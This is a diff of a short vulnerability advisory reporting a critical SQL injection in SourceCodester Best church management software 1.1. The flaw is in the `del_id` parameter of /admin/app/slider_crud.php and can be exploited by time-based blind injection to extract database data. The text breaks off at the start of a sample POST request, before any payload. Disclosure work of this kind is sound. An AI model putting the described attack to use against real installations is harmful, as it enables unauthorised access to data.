Yesec/Best-church-management-software/slider_crud.php_SQLi.md

 # Code Source
 https://www.sourcecodester.com/php/17856/best-church-management-software-free-download-full-version.html
 # Description
 A vulnerability has been found in SourceCodester Best church management software 1.1 and classified as critical.
 SourceCodester Best church management software 1.1 has a SQL Injection vulnerability in /admin/app/slider_crud.php.
-Affected is file /admin/app/slider_crud.php,The manipulation of the argument del_id leads to SQL inject.
+Affected is file /admin/app/slider_crud.php,The manipulation of the argument `del_id` leads to SQL inject.
 Remote attackers can leverage time-based blind SQL injection to extract data from the database.

-# Request：
+# Request
 ```
 POST /admin/app/slider_crud.php HTTP/1.1
 Host: 127.0.0.1